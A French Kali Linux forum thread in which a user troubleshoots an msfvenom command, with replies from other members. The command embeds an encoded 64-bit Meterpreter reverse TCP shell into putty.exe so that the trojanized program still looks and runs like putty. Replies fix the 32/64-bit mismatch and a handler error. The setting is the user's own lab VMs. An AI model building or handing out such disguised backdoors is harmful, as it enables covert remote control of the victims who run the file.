Auteur Sujet: Msfvenom [ Résolu ]  (Lu 5671 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne arawaks
  • Membre Junior
  • *
  • Messages: 28
  • +0/-0
Msfvenom [ Résolu ]
« le: 29 octobre 2016 à 17:37:29 »
Bonjour à tous !

Je viens vous voir car malgré mes recherches je n'ai pas trouvé de solutions concluante à mon problème, que ça soit par le biais de moteurs de recherches, turoriels youtube conseillé par un membre de ce forum, où en réitérant mes essaies en changeant les options de mon payload, je suis pas tellement fans des vidéos où on doit recopier bếtement, mais je dois bien avouer que ça m'a bien aidé !!  Et qu'il faut bien commencer quelque part !!

Bref après plusieurs semaines de recherches, plusieurs essaies pour constater une éventuel différence, j'ai finit par me résoudre à venir vous demander de l'aides, car je n'ai rien trouvé non plus sur ce forum, il y a bien des gens qui ont eu le même problème, mais aucunes solutions n'ai donné ( j'ai fait toutes les pages donné où le nom msvenom était cité ) ..

Et une dernière petite paranthése, je ne considère pas que venir demander de l'aide quand on ce trouve dans une impasse est dégradant, simplement j'aurais souhaiter pouvoir me débrouiller moi même, afin d'être plus autonome, forcé de constater que je suis dans une impasse, donc j'espère que l'un d'entre vous pourra et voudra m'aider, car je ne pense pas qu'au final ce problème soit si "ardue" pour la majorité  d'entres vous .


 Venons en au faits : J'essaie de crée un reverse TCP caché dans le logiciel " putty.exe " .

J'ai pour cela mes VMs à dispositions, et j'ai exprès installé un windows xp 32 bits, pour pouvoir tester les commandes qui m'ont était fournit sur le tutoriel, et ça marche parfaitement sous du windows xp 32 bits !!

J'ai donc voulu adapter la même commande mais pour du windows 7/10 64 bits,  j'ai tapé la commande suivante :

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.21 LPORT=4444 R | msfvenom -f exe -x /root/Bureau/putty.exe -o /root/Bureau/programme.exe -e x64/xor -i 4 -a x64 --platform windows -k 

Donc histoire d'apprendre de mon erreur, voilà ce que je comprend personnellement de ma commande :

1 : Utilisation du Payload windows/x64/meterpreter/reverse_tcp
2 : L'adresse local de l'hote ainsi que son port
3 : Le R pour indiquer que je souhaite utiliser un exe en " brut " sans modifications de celui ci
4 : Une sortie où j'indique le format avec f, et le lieu de destination de l'exe que je ne souhaite pas modifer
5 : Le o pour la destination de sauvegarde de mon programme ainsi que l'encodage utiliser avec son nombre d'itérations
6 : Le a pour lui indiquer l''architecture ainsi que la platform,  que je n'ai pas indiqué au début étant donné que dans le payload le " x64 " était indiqué ... Suivit du k pour lui dire que je souhaite conserver les fonctions de l'executable, donc putty.exe ...

Je pense ne pas me tromper quand aux commandes .. mais peut être ai je oublié quelque choses ? Etant donné que quand j'execute mon programme sous du windows 7/10 j'ai bien l'icone de putty, mais rien de s'execute ni putty ni la connexion distante ..

Aucuns messages d'erreurs ne m'indiquant qu'il n'a pas pu executer le programme car il est en 32 bits, je suppose donc que celui ci est bien passé en 64, et l'icone m'a "l'air" de dire qu'il a bien prit en compte certaines commandes concernant putty .. Mais les fonctions principals ne fonctionnent pas et je ne trouve pas pourquoi .... 

Si vous pouviez m'indiquer où est ce que ça bloque ? Car j'ai beau chercher je ne trouve rien, et j'aimerais apprendre de mes erreurs ...

Un grand merci d'avance car honnétement je commence un desespérer de pouvoir trouver la solutions  :'(

Cordialement
 Arawaks
« Modifié: 30 octobre 2016 à 20:57:07 par arawaks »

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Msfvenom
« Réponse #1 le: 29 octobre 2016 à 20:14:08 »
Tu mélange un payload 64 avec putty 32, essaye avec celui-ci https://blog.splunk.net/64bit-putty/

Hors ligne arawaks
  • Membre Junior
  • *
  • Messages: 28
  • +0/-0
Re : Msfvenom
« Réponse #2 le: 30 octobre 2016 à 09:52:41 »
Merci pour ta réponse !

Oh non ... Toute mes excuses pour cette erreur vraiment grotesque, j'étais tellement accaparé par les commandes de msfvenom, j'ai pas 1 seule secondes pu penser que ça pouvait venir d'une erreur aussi stupide ... Désolé ...

Là quand j'execute mon exe, si je suis en train d'écouter les connexions entrantes avec " l'exploit handler " il m'affiche ce message d'erreur :

" OpenSSL::SSLError SLL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A " 

Par contre quand je n'écoute pas, il me démarre bien putty, mais bien sur étant donné que je ne suis pas connecté à l'exploit  il ne me connecte pas à la cible..

J'ai essayé de regardé moi même d'où ce probléme pouvait venir, mais aucun site que j'ai trouvé ne concernent spécifiquement msfvenom, donc je ne voudrait pas appliquer une pseudo solution complétement innadapté ..

Encore merci à toi ( et peut être aux futurs autres réponses des autres membres ) de me permettre d'apprendre de mes erreurs, et de contribuer à mon perfectionnement

Cordialement

Hors ligne arawaks
  • Membre Junior
  • *
  • Messages: 28
  • +0/-0
Re : Msfvenom
« Réponse #3 le: 30 octobre 2016 à 20:49:54 »
Personne ne serait comment régler ce message  d'erreur ??  ???

EDIT :  Je viens de trouver, merci quand même à tous !  En m'excusant du dérangement

Cordialement
« Modifié: 30 octobre 2016 à 20:56:47 par arawaks »

Hors ligne kcdtv

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 641
  • +61/-3
    • wifi-libre
Re : Msfvenom [ Résolu ]
« Réponse #4 le: 01 novembre 2016 à 17:24:07 »
C'était quoi la solution? (comme ça, si d'autres ont le même problème ils pourront le résoudre  :) )

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Re : Msfvenom [ Résolu ]
« Réponse #5 le: 02 novembre 2016 à 07:16:29 »
C'était quoi la solution? (comme ça, si d'autres ont le même problème ils pourront le résoudre  :) )
ici: https://github.com/rapid7/metasploit-framework/issues/6472